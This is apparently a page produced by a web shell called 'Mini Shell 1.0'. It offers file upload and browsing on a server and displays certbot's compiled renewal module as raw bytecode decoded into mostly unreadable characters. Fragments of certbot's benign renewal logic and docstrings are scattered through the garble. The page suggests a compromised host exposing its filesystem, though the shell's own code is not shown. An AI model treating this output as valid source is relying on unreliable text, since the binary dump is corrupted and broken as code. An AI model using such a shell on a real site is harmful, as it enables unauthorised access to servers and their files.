HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /lib/python3/dist-packages/certbot/_internal/__pycache__/
Upload File :
Current File : //lib/python3/dist-packages/certbot/_internal/__pycache__/renewal.cpython-311.pyc
�

�;d�d����dZddlZddlZddlZddlZddlZddlZddlZddlm	Z	ddlm
Z
ddlmZddlmZddlm
Z
ddlmZdd	lmZdd
lmZddlmZddlmZdd
lmZddlmZddlmZddlmZddlmZddlmZddlmZddlmZddlm Z ddlm!Z!ddlm"Z"ddl#m$Z%ddl&m'Z(ddl)m*Z*ddl+mZ,ej-e.��Z/gd�Z0ddgZ1gd�Z2e3ej4e2e1e0d����Z5d ej6d!e7d"ee!j8fd#�Z9d ej6d$e
e7e	fd"dfd%�Z:d ej6d$e
e7e	fd"dfd&�Z;d ej6d$e
e7e	fd"dfd'�Z<d$e
e7e	fd"e
e7e	ffd(�Z=d)e7d*eee7e7fd"ee7fd+�Z>d,e7d*e7d"e?fd-�Z@d,e7d*e7d"eAfd.�ZBd,e7d*e7d"ee7fd/�ZCd ej6d0e!j8d"e?fd1�ZDd ej6d0e!j8d2e7d"dfd3�ZEd ej6d0e!j8d"dfd4�ZFd ej6d5eee7d6ejGd0e!j8d"df
d7�ZHd8ee7d9e7d"e7fd:�ZId ej6d;ee7d<ee7d=ee7d>ee7d"dfd?�ZJd ej6d"dfd@�ZKdAe7d ej6d"dfdB�ZLdS)CzGFunctionality for autorenewal and associated juggling of configurations�N)�Any)�Dict)�Iterable)�List)�Mapping)�Optional)�Union)�default_backend)�ec)�rsa)�load_pem_private_key)�
configuration)�crypto_util)�errors)�util)�cli)�client)�	constants)�hooks)�storage)�updater)�obj)�disco)�os)�
config_dir�logs_dir�work_dir�
user_agent�server�account�
authenticator�	installer�
renew_hook�pre_hook�	post_hook�http01_address�preferred_chain�key_type�elliptic_curve�rsa_key_size�http01_port)�must_staple�allow_subset_of_names�	reuse_key�	autorenew)�pref_challs�config�	full_path�returnc�D�	tj||��}n�#tjtf$rz}t
�d|��t
�dt|����t
�dtj
����Yd}~dSd}~wwxYwd|jvrt
�d|��dS|jd}d|vrt
�d|��dS|�d	d
��|d	<t|��}	t||��t||��ny#t tjf$r`}t
�d|t|����t
�dtj
����Yd}~dSd}~wwxYw	d�|���D��|_n9#tj$r'}t
�d
||��Yd}~dSd}~wwxYw|S)a�Try to instantiate a RenewableCert, updating config with relevant items.

    This is specifically for use in renewal and enforces several checks
    and policies to ensure that we can try to proceed with the renewal
    request. The config argument is modified by including relevant options
    read from the renewal configuration file.

    :param configuration.NamespaceConfig config: configuration for the
        current lineage
    :param str full_path: Absolute path to the configuration file that
        defines this lineage

    :returns: the RenewableCert object or None if a fatal error occurred
    :rtype: `storage.RenewableCert` or NoneType

    z(Renewal configuration file %s is broken.zThe error was: %s
Skipping.�Traceback was:
%sN�
renewalparamsz<Renewal configuration file %s lacks renewalparams. Skipping.r!zJRenewal configuration file %s does not specify an authenticator. Skipping.r(rzHAn error occurred while parsing %s. The error was %s. Skipping the file.c�6�g|]}tj|����S�)r�enforce_domain_sanity)�.0�ds  �;/usr/lib/python3/dist-packages/certbot/_internal/renewal.py�
<listcomp>z!_reconstitute.<locals>.<listcomp>ps3��>�>�>���4�Q�7�7�>�>�>�z{Renewal configuration file %s references a certificate that contains an invalid domain name. The problem was: %s. Skipping.)r�
RenewableCertr�CertStorageError�IOError�logger�error�str�debug�	traceback�
format_excr�get�"_remove_deprecated_config_elements� restore_required_config_elements�_restore_plugin_configs�
ValueError�Error�names�domains�ConfigurationError)r1r2�renewal_candidaterCr6s     r<�
_reconstituterR8si��$�#�1�)�V�D�D�����#�W�-�������?��K�K�K����3�S��Z�Z�@�@�@����)�9�+?�+A�+A�B�B�B��t�t�t�t�t�����	����
�/�=�=�=����2�3<�	>�	>�	>��t�%�3�O�D�M��m�+�+����5�6?�	A�	A�	A��t�!.� 1� 1�*�e� D� D�M�*��7�}�E�E�M��(���?�?�?���
�6�6�6�6�����%�������
!�"+�S��Z�Z�	9�	9�	9�	���)�9�+?�+A�+A�B�B�B��t�t�t�t�t����������>�>�#4�#:�#:�#<�#<�>�>�>������$�������,�-6��	?�	?�	?��t�t�t�t�t�����	�����sF��B(�A/B#�#B(�( E	�	F?�AF:�:F?�#G'�'H�6H�Hr6c���d|vr!tjd��s
|d|_d|vr=tjd��s+|d}t|t��r|g}||_dSdSdS)z�
    webroot_map is, uniquely, a dict, and the general-purpose configuration
    restoring logic is not able to correctly parse it from the serialized
    form.
    �webroot_map�webroot_pathN)r�
set_by_clirT�
isinstancerDrU)r1r6�wps   r<�_restore_webroot_configrY{s����
�%�%�c�n�]�.K�.K�%�*�=�9�����&�&�s�~�n�/M�/M�&�
�>�
*���b�#���	���B� �����	'�&�&�&r>c	�X�g}|ddkrt||��n|�|d��|�d���|�|d��t|��D]�}|�dd��}|���D]�\}}|�|dz��retj|��sQ|dvrt||t|�����Ttj|��}t||||��������dS)aSets plugin specific values in config from renewalparams

    :param configuration.NamespaceConfig config: configuration for the
        current lineage
    :param configobj.Section renewalparams: Parameters from the renewal
        configuration file that defines this lineage

    r!�webrootr"N�-�_)�None�True�False)rY�appendrH�set�replace�items�
startswithrrV�setattr�eval�
argparse_type)r1r6�plugin_prefixes�
plugin_prefix�config_item�config_value�casts       r<rKrK�s]��("$�O��_�%��2�2���
�6�6�6�6����}�_�=�>�>�>�����%�%�1����}�[�9�:�:�:��_�-�-�E�E�
�%�-�-�c�3�7�7�
�)6�)<�)<�)>�)>�
	E�
	E�%�K���%�%�m�c�&9�:�:�	
E�3�>�R]�C^�C^�	
E� �#<�<�<��F�K��l�1C�1C�D�D�D�D��,�[�9�9�D��F�K���l�1C�1C�D�D�D��
	E�E�Er>c���tjdtfftttjt����tttjt����tttjt������}|D]E\}}||vr<tj|��s(||||��}t|j||���FdS)aSets non-plugin specific values in config from renewalparams

    :param configuration.NamespaceConfig config: configuration for the
        current lineage
    :param configobj.Section renewalparams: parameters from the renewal
        configuration file that defines this lineage

    r0N)�	itertools�chain�_restore_pref_challs�zip�BOOL_CONFIG_ITEMS�repeat�
_restore_bool�INT_CONFIG_ITEMS�_restore_int�STR_CONFIG_ITEMS�_restore_strrrVrf�	namespace)r1r6�required_items�	item_name�restore_func�values      r<rJrJ�s����_�
�-�	.�0���y�/�
�>�>�?�?���i�.�|�<�<�=�=���i�.�|�<�<�=�=�	?�?�N�
$2�8�8��	�<��
�%�%�c�n�Y�.G�.G�%� �L��M�)�,D�E�E�E��F�$�i��7�7�7��8�8r>c�>�d�|���D��S)z�Removes deprecated config options from the parsed renewalparams.

    :param dict renewalparams: list of parsed renewalparams

    :returns: list of renewalparams with deprecated config options removed
    :rtype: dict

    c�6�i|]\}}|tjv�||��Sr8)r�DEPRECATED_OPTIONS)r:�option_name�vs   r<�
<dictcomp>z6_remove_deprecated_config_elements.<locals>.<dictcomp>�s6��6�6�6�/��Q��c�4�4�4�
��4�4�4r>)rd)r6s r<rIrI�s.��6�6�=�3F�3F�3H�3H�6�6�6�6r>�unused_namer~c�^�t|t��r|gn|}tj|��S)a�Restores preferred challenges from a renewal config file.

    If value is a `str`, it should be a single challenge type.

    :param str unused_name: option name
    :param value: option value
    :type value: `list` of `str` or `str`

    :returns: converted option value to be stored in the runtime config
    :rtype: `list` of `str`

    :raises errors.Error: if value can't be converted to a bool

    )rWrDr�parse_preferred_challenges)r�r~s  r<rqrq�s/��$"�%��-�-�8�U�G�G�5�E��)�%�0�0�0r>�namec�r�|���}|dvrtjd|�d|�����|dkS)a#Restores a boolean key-value pair from a renewal config file.

    :param str name: option name
    :param str value: option value

    :returns: converted option value to be stored in the runtime config
    :rtype: bool

    :raises errors.Error: if value can't be converted to a bool

    )�true�falsezExpected True or False for z but found r�)�lowerrrM)r�r~�lowercase_values   r<ruru�sI���k�k�m�m�O��/�/�/��l�Q��Q�Q�%�Q�Q�R�R�R��f�$�$r>c���|dkr4|dkr.t�d��tjd��S	t	|��S#t
$rt
jd|�����wxYw)a#Restores an integer key-value pair from a renewal config file.

    :param str name: option name
    :param str value: option value

    :returns: converted option value to be stored in the runtime config
    :rtype: int

    :raises errors.Error: if value can't be converted to an int

    r+r^z!updating legacy http01_port valuezExpected a numeric value for )rB�infor�flag_default�intrLrrM�r�r~s  r<rwrws����}����&������7�8�8�8���
�.�.�.�C��5�z�z����C�C�C��l�A�4�A�A�B�B�B�C���s�A�"A-c��|dkrN|tjkr>t�dtjd|��tjdS|dkrdn|S)z�Restores a string key-value pair from a renewal config file.

    :param str name: option name
    :param str value: option value

    :returns: converted option value to be stored in the runtime config
    :rtype: str or None

    rz$Using server %s instead of legacy %sr^N)r�V1_URIrBr��CLI_DEFAULTSr�s  r<ryrysb��"�x���E�Y�%5�5�5����:��*�8�4�e�	=�	=�	=��%�h�/�/��F�?�?�4�4��-r>�lineagec��|jrt�d��dS|���rt�d��dS|jrt�d��dSt
jd��dS)zDReturn true if any of the circumstances for automatic renewal apply.z+Auto-renewal forced with --force-renewal...Tz0Certificate is due for renewal, auto-renewing...zCCertificate not due for renewal, but simulating renewal for dry runz#Certificate not yet due for renewalF)�renew_by_defaultrBrE�should_autorenewr��dry_run�display_util�notify)r1r�s  r<�should_renewr�3s���
������B�C�C�C��t����!�!�����F�G�G�G��t�
�~�����Y�Z�Z�Z��t���=�>�>�>��5r>�original_serverc���tj|j��rZtj|��sH|jsCd�|�����}t
jd|�d����dSdSdS)z9Do not renew a valid cert with one from a staging server!z, z^You've asked to renew/replace a seemingly valid certificate with a test certificate (domains: z@). We will not do that unless you use the --break-my-certs flag!N)r�
is_stagingr�break_my_certs�joinrNrrM)r1r�r�rNs    r<�_avoid_invalidating_lineager�Bs�����v�}�%�%�A����/�/�	A��(�
A��	�	�'�-�-�/�/�2�2���l�@�49�@�@�@�A�A�A�	A�A�	A�	A�
A�
Ar>c�B����tjd��r	�jsdS�js	�jsdS�jrdS�j����d��fd�fd���fd�fd���fd�fg}|D]0}|d	��rt
jd
|d�d�����1dS)
z�Don't allow combining --reuse-key with any flags that would conflict
    with key reuse (--key-type, --rsa-key-size, --elliptic-curve), unless
    --new-key is also set.
    r.Nz
--key-typec�>����j���kS�N)�private_key_typer�)�ktr�s��r<�<lambda>z,_avoid_reuse_key_conflicts.<locals>.<lambda>js����w�/�5�5�7�7�7�r>z--rsa-key-sizec�0���dko�j�jkS)Nr)r*�r1r�r�s���r<r�z,_avoid_reuse_key_conflicts.<locals>.<lambda>ls����u��L��!4��8L�!L�r>z--elliptic-curvec����dko:�jo3�j����j���kS)N�ecdsa)r)r�r�s���r<r�z,_avoid_reuse_key_conflicts.<locals>.<lambda>nsE����w��Q�7�#9�Q��&�,�,�.�.�'�2H�2N�2N�2P�2P�P�r>�zUnable to change the rz� of this certificate because --reuse-key is set. To stop reusing the private key, specify --no-reuse-key. To change the private key this one time and then reuse it in future, add --new-key.)rrVr.�new_keyr(r�rrM)r1r��potential_conflicts�conflictr�s``  @r<�_avoid_reuse_key_conflictsr�Os1������~�k�"�"��6�+;�������V�%5�����~����	��	�	�	 �	 �B�
�	7�	7�	7�	7�	7�	9�	�	L�	L�	L�	L�	L�	L�	N�	�
Q�
Q�
Q�
Q�
Q�
Q�	R���(�"�"���8�A�;�=�=�	"��,�!����!�!�!�"�"�
"�	"�"�"r>rO�	le_clientc��|jd}|�dtjd����}t	|||��t||��|s|���}|jr<|js5tj
�|j��}t||��nd}|�||��\}}}}	|jr>t �dtj
�|j����nY|���}
|�|
||j||��|�|�����t1j|||j��dS)zRenew a certificate lineage.r6rNz(Dry run: skipping updating lineage at %s)rrHrr�r�r�rNr.r�r�path�normpath�privkey�_update_renewal_params_from_key�obtain_certificater�rBrE�dirname�cert�latest_common_version�save_successor�pem�update_all_links_torr#�live_dir)r1rOr�r��renewal_paramsr�r��new_cert�	new_chainr]�
prior_versions           r<�
renew_certr�{sn���*�?�;�N�$�(�(��3�3C�H�3M�3M�N�N�O�����A�A�A��v�w�/�/�/��"��-�-�/�/���������'�"�"�7�?�3�3��'���8�8�8�8���&/�&B�&B�7�G�&T�&T�#�H�i��!�
�~�E����?�����QX�Q]�A^�A^�_�_�_�_��5�5�7�7�
����}�h���Y�PV�W�W�W��#�#�G�$A�$A�$C�$C�D�D�D�	��V�W�g�&6�7�7�7�7�7r>�msgs�categoryc�P���fd�|D��}dd�|��zS)z:Format a results report for a category of renewal outcomesc3�(�K�|]}|�d��d�V��
dS)z (�)Nr8)r:�mr�s  �r<�	<genexpr>zreport.<locals>.<genexpr>�s0�����5�5�1�!�!�!�X�X�X�
&�5�5�5�5�5�5r>z  z
  )r�)r�r��liness ` r<�reportr��s3���5�5�5�5��5�5�5�E��&�+�+�e�$�$�$�$r>�renew_successes�renew_failures�
renew_skipped�parse_failuresc��tj}tj}|dtj����|jrdnd}|r$|d��|t|d����|s2|s0|d|�d���|j�|j	�|j
�|d	��n�|r+|s)|d
|�d���|t|d����n~|r(|s&|d
|��|t|d����nT|rR|rP|d|�d���|t|d��dz��|d|��|t|d����|r$|d��|t|d����|tj��dS)a�
    Print a report to the terminal about the results of the renewal process.

    :param configuration.NamespaceConfiguration config: Configuration
    :param list renew_successes: list of fullchain paths which were renewed
    :param list renew_failures: list of fullchain paths which failed to be renewed
    :param list renew_skipped: list of messages to print about skipped certificates
    :param list parse_failures: list of renewal parameter paths which had errors
    �
zsimulated renewal�renewalz7The following certificates are not due for renewal yet:�skippedzNo zs were attempted.NzNo hooks were run.zCongratulations, all z
s succeeded: �successz@All %ss failed. The following certificates could not be renewed:�failurezThe following zs succeeded:zThe following %ss failed:zB
Additionally, the following renewal configurations were invalid: �	parsefail)r�r�rBrC�display_obj�
SIDE_FRAMEr�r�r$r#r%)r1r�r�r�r�r��notify_error�renewal_nouns        r<�_renew_describe_resultsr��s%���
 �F��<�L�
�F�(��&�(�(�)�)�)�*0�.�G�&�&�i�L��1���H�I�I�I���v�m�Y�/�/�0�0�0��8�>�8���4�\�4�4�4�5�5�5��O�'��!�-��1A�1M��F�'�(�(�(��	�8��8���B�|�B�B�B�C�C�C���v�o�y�1�1�2�2�2�2�	�8��8���!�".�	0�	0�	0���V�N�I�6�6�7�7�7�7�	�8�O�8���:��:�:�:�;�;�;���v�o�y�1�1�D�8�9�9�9���0�,�?�?�?���V�N�I�6�6�7�7�7��4��� �	!�	!�	!���v�n�k�2�2�3�3�3�
�F�;�!�"�"�"�"�"r>c�V��t�fd��jD����rtjd����jrtj��j��g}ntj���}g}g}g}g}tj	�
��o�j}|D�]�}tj
d|zd���tj���}tj|��}		t#||��}
nu#t$$rh}t&�d||	|��t&�dt-j����|�|��Yd}~��d}~wwxYw	|
s|�|���nD|
���d	d
lm}t8j���}
t?||
��rz|rFtAj!dd��}t&�"d
|��tGj$|��d}|�%||
|
��|�|
j&��nltOj(|
�)d|
�*������}|�|
j&�d|�+d������tYj-||
|
����+#t$$ro}t&�d|	|��t&�dt-j����|
r|�|
j&��Yd}~���d}~wwxYwt]�||||��|s|r4tjt_|���dt_|���d����t&�d��dS)z5Examine each lineage; renew if due and report resultsc3�*�K�|]
}|�jvV��dSr�)rT)r:�domainr1s  �r<r�z)handle_renewal_request.<locals>.<genexpr>�s+�����
I�
I��6��+�+�
I�
I�
I�
I�
I�
Ir>afCurrently, the renew verb is capable of either renewing all installed certificates that are due to be renewed or renewing a single certificate specified by its name. If you would like to renew specific certificates by their domains, use the certonly command instead. The renew verb may provide other options for selecting certificates to renew in the future.zProcessing F)�pausezTRenewal configuration file %s (cert: %s) produced an unexpected error: %s. Skipping.r5Nr)�mainr�i�z3Non-interactive renewal: random delay of %s secondsr�z expires on z%Y-%m-%dz-Failed to renew certificate %s with error: %sz renew failure(s), z parse failure(s)zno renewal failures)0�anyrOrrM�certnamer�renewal_file_for_certname�renewal_conf_files�sys�stdin�isatty�random_sleep_on_renewr��notification�copy�deepcopy�lineagename_for_filenamerR�	ExceptionrBrCrErFrGra�ensure_deployed�certbot._internalr��
plugins_disco�PluginsRegistry�find_allr��random�uniformr��time�sleepr��	fullchainr�notAfter�versionr��strftimer�run_generic_updatersr��len)r1�
conf_filesr�r�r�r��apply_random_sleep�renewal_file�lineage_config�lineagenamerQ�er��plugins�
sleep_time�expirys`               r<�handle_renewal_requestr	�s5����
I�
I�
I�
I�&�.�
I�
I�
I�I�I�	Q��l�P�Q�Q�	Q���8��7����P�P�Q�
�
��/��7�7�
��O��N��M��N�!�Y�-�-�/�/�/�P�F�4P��"�:C�:C���!�-�,�">�e�L�L�L�L���v�.�.���6�|�D�D��	� -�n�l� K� K�����	�	�	��L�L�I�'��a�
9�
9�
9�
�L�L�-�y�/C�/E�/E�F�F�F��!�!�,�/�/�/��H�H�H�H�����
	����)	C�$�
6��%�%�l�3�3�3�3�!�1�1�3�3�3�2�2�2�2�2�2�'�7�@�@�B�B����0A�B�B�G�)�3�%+�^�A�v�%>�%>�
����$Y�$.�0�0�0��
�:�.�.�.�-2�*��O�O�N�G�=N�O�O�O�#�*�*�+<�+F�G�G�G�G�(�1�2C�2K�2K�� 1� G� G� I� I�3K�3K�L�L�F�!�(�(�?P�?Z�?Z�?Z�)/����)D�)D�)D�*F�G�G�G��,�^�=N�-4�6�6�6����	C�	C�	C��L�L�?��Q�
�
�
�
�L�L�-�y�/C�/E�/E�F�F�F� �
C��%�%�&7�&A�B�B�B����������	C�����F�O�^�)�>�;�;�;��_��_��l��>�"�"�]�]�s�>�7J�7J�]�]�]�_�_�	_�
�L�L�&�'�'�'�'�'s3�"C3�3
E%�=AE � E%�)EK�
M�A$L<�<M�key_pathc���t|d��5}t|���dt�����}ddd��n#1swxYwYt	|t
j��rd|_|j|_	dSt	|tj��rd|_|jj
|_dStjd|�dt#|���d����)N�rb)�password�backendrr�zKey at z is of an unsupported type: �.)�openr
�readr
rWr�
RSAPrivateKeyr(�key_sizer*r�EllipticCurvePrivateKey�curver�r)rrM�type)r
r1�file_h�keys    r<r�r�6s��	
�h��	�	�\��"�6�;�;�=�=�4��IZ�IZ�[�[�[��\�\�\�\�\�\�\�\�\�\�\����\�\�\�\��#�s�(�)�)�Y����!�l�����	�C��3�	4�	4�Y�!��� #�	�������l�W�X�W�W�4�PS�9�9�W�W�W�X�X�Xs�1A�A�A)M�__doc__r�ro�loggingr�r�r�rF�typingrrrrrrr	�cryptography.hazmat.backendsr
�)cryptography.hazmat.primitives.asymmetricrr�,cryptography.hazmat.primitives.serializationr
�certbotrrrrr�rrrrrr�certbot._internal.displayrr��certbot._internal.pluginsrr��certbot.compatr�certbot.displayr��	getLogger�__name__rBrxrvrsrbrp�CONFIG_ITEMS�NamespaceConfigrDr?rRrYrKrJrIrq�boolrur�rwryr�r�r��Clientr�r�r�r	r�r8r>r<�<module>r*sM��M�M�������������
�
�
�
�
�
�
�
���������������������������������������������������8�8�8�8�8�8�8�8�8�8�8�8�9�9�9�9�9�9�M�M�M�M�M�M�!�!�!�!�!�!�������������������!�!�!�!�!�!�$�$�$�$�$�$�'�'�'�'�'�'�#�#�#�#�#�#�%�%�%�%�%�%�%�%�%�%�%�%�8�8�8�8�8�8�<�<�<�<�<�<�������0�0�0�0�0�0�	��	�8�	$�	$��E�E�E��#�M�2��"�"�"���s�?�9�?��'�)9�;K�M�M�N�N��@�-�7�@� �@�%-�g�.C�%D�@�@�@�@�F!�M�$A�!�+2�3��8�+<�!�AE�!�!�!�!�$)E�M�$A�)E�+2�3��8�+<�)E�AE�)E�)E�)E�)E�X8�]�-J�8�4;�C��H�4E�8�JN�8�8�8�8�,
6�g�c�3�h�6G�
6�D�QT�VY�QY�N�
6�
6�
6�
6�1�c�1�%��S�	�3��2G�1�D�QT�I�1�1�1�1�,%��%�C�%�D�%�%�%�%�$C�s�C�3�C�3�C�C�C�C�,.�s�.�3�.�8�C�=�.�.�.�.�2��6���AV��[_�����
A�
�(E�
A�)0�)>�
A�QT�
A�Y]�
A�
A�
A�
A�)"�}�'D�)"�(/�(=�)"�BF�)"�)"�)"�)"�X8�}�4�8�x��S�	�?R�8� �-�8�29�2G�8�LP�8�8�8�8�8%��#��%�#�%�#�%�%�%�%�-#�M�$A�-#�TX�Y\�T]�-#�,0��I�-#�FJ�3�i�-#�,0��I�-#�:>�-#�-#�-#�-#�`f(�=�#@�f(�T�f(�f(�f(�f(�R
Y�c�
Y�=�;X�
Y�]a�
Y�
Y�
Y�
Y�
Y�
Yr>